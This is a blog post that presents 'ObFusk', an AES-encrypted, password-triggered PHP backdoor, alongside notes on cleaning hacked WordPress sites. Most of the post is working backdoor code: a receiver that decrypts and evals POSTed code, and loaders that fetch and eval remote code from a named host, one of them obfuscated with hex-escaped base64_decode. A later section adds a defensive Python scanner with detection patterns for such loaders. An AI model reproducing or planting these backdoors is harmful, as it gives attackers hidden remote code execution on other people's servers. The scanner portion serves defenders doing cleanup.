ObFusk – AES256 encrypted/obfuscated PHP Backdoor

I’ve been cleaning up a lot of hacked WordPress sites lately, and I thought I’d share my findings, along with my attempt to refine this technique using AES encryption instead of obfuscation.

Most infections are hidden inside obfuscated code: someone has tried to conceal the source within complex combinations of built-in PHP functions such as base64_encode, hex encodings and str_rot13 rotations.

Usually you can spot these things just by looking at them and guessing. For example, if the values come in pairs and never exceed “FF”, we can safely assume we are looking at hex-encoded bytes, as in “\x30\x6a\xff”.

Obfuscated code is usually easy to find with a few simple techniques, some of which are described in a previous article: unhacking-a-hacked-wordpress-site

This got me thinking: what if we could encrypt the payload and trigger the code with a password…

I started out by designing a “Control Center” from which I could generate the encrypted payload to be sent to the target server.

You can download it here or try it out here

On the left is the PHP code to be executed on the remote server; in the middle is the same code encrypted with AES-256-CBC; on the right is a preformatted curl command carrying the encrypted script and the password for decryption.

Let's study the curl part:

obfusk=RjdGRitFYjY...

This is your encrypted and URL-encoded PHP payload.

key=MjAxOC0wNC0zMA%3D%3D

The decryption password “MjAxOC0wNC0zMA%3D%3D” is attached to the URL. The password is the generation date (in this case 2018-04-30), base64-encoded and then URL-encoded.

Now we need a receiving script to decrypt and run our code.

```php
function my_decrypt($data, $key) {
    // The key arrives base64-encoded in the query string (so it also lands in the access log).
    // A 10-byte date is far shorter than the 32-byte AES-256 key; openssl_decrypt() zero-pads it.
    $encryption_key = base64_decode($key);
    // The payload is base64(ciphertext . '::' . iv): the IV travels together with the data.
    list($encrypted_data, $iv) = explode('::', base64_decode($data), 2);
    return openssl_decrypt($encrypted_data, 'aes-256-cbc', $encryption_key, 0, $iv);
}

// Trigger only when both the POSTed payload and the GET key are present.
if ( ! empty($_POST['obfusk']) AND ! empty($_GET['key'])) {
    error_reporting(0); // silence any notice the decrypted code might raise
    eval(my_decrypt($_POST['obfusk'], $_GET['key']));
    die();
}
```

Best practice would of course be to store your decryption routines on a remote server; then you only need file_get_contents() or curl to fetch your code.

Example 1 (requires allow_url_fopen)

```php
@eval(file_get_contents("https://bekla.ga/obf.txt"));
```

Or obfuscated with hex and base64:

```php
$b="\142\x61\x73\145\66\x34\137\x64\x65\143\x6f\144\x65"; // base64_decode
@eval($b('ZmlsZV9nZXRfY29udGVudHMoImh0dHBzOi8vYmVrbGEuZ2Evb2JmLnR4dCIpOw==')); // file_get_contents("https://bekla.ga/obf.txt");
```

Example 2 (requires the curl extension)

```php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://bekla.ga/obf.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Fetch once and keep the body (calling curl_exec() twice would issue the request twice).
$code = curl_exec($ch);
if ($code === FALSE) {
    echo "Error: " . curl_error($ch);
} else {
    eval($code);
}
curl_close($ch);
```
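A triage scanner for the spotting rules above, written as an added example for this post (not the author's Control Center code): it resolves PHP octal/hex string escapes so a hidden function name such as base64_decode becomes greppable again, then flags eval() paired with a decoder/decryptor, a remote fetch, or request input, covering the receiver script, Example 1 and the hex/base64 loader. The sample snippets and the URL in them are constructed for the demonstration.

```python
import re

# Constructed sample snippets modelled on the patterns shown on this page (not taken from any real site).
SAMPLES = {
    "hex_octal_loader": r'$b="\142\x61\x73\145\66\x34\137\x64\x65\143\x6f\144\x65"; @eval($b("Li4u"));',
    "aes_receiver": ('function my_decrypt($d, $k) { return openssl_decrypt($d, "aes-256-cbc", base64_decode($k), 0, "iv"); }\n'
                     'if (!empty($_POST["obfusk"])) { eval(my_decrypt($_POST["obfusk"], $_GET["key"])); }'),
    "remote_include": '@eval(file_get_contents("https://example.invalid/obf.txt"));',
    "benign": '$x = base64_decode($row["avatar"]); echo strlen($x);',
}

EVAL_RE = re.compile(r"@?\beval\s*\(")
DECODER_RE = re.compile(r"\b(base64_decode|str_rot13|hex2bin|gzinflate|gzuncompress|openssl_decrypt)\b")
REMOTE_RE = re.compile(r"\b(file_get_contents|curl_init|curl_exec|fopen)\b")
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ESCAPE_RE = re.compile(r"\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}")


def decode_php_escapes(s):
    r"""Resolve PHP double-quoted-string escapes (octal \142, hex \x61) to plain text,
    so that a function name written as "\142\x61..." reads as its real name."""
    def repl(m):
        tok = m.group(0)
        return chr(int(tok[2:], 16)) if tok[1] in "xX" else chr(int(tok[1:], 8))
    return ESCAPE_RE.sub(repl, s)


def scan(src):
    """Return the list of indicator tags that fire on one PHP source string."""
    text = decode_php_escapes(src)
    findings = []
    # A decoder name that only appears after de-escaping was deliberately hidden.
    if DECODER_RE.search(text) and not DECODER_RE.search(src):
        findings.append("hidden-function-name")
    if EVAL_RE.search(text):
        if DECODER_RE.search(text):
            findings.append("eval+decoder")
        if REMOTE_RE.search(text):
            findings.append("eval+remote-fetch")
        if INPUT_RE.search(text):
            findings.append("eval+request-input")
    return findings


def scan_file(path):
    """Scan one PHP file from disk with the same rules."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan(fh.read())


if __name__ == "__main__":
    for label, snippet in SAMPLES.items():
        print(f"{label:18s} {scan(snippet)}")
```

The tags are heuristics for prioritising files during a cleanup, not proof of compromise; a benign base64_decode without eval() produces no finding.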

There are also online obfuscators such as FOPO (Free Online PHP Obfuscator). The following is the opening of “Example 1” after FOPO obfuscation: a hex/octal-escaped base64_decode, followed by an eval of a long base64 blob.

```php
$f6e83d67="\142\x61\163\x65\x36\x34\137\144\x65\x63\x6f\x64\145"; // base64_decode
```
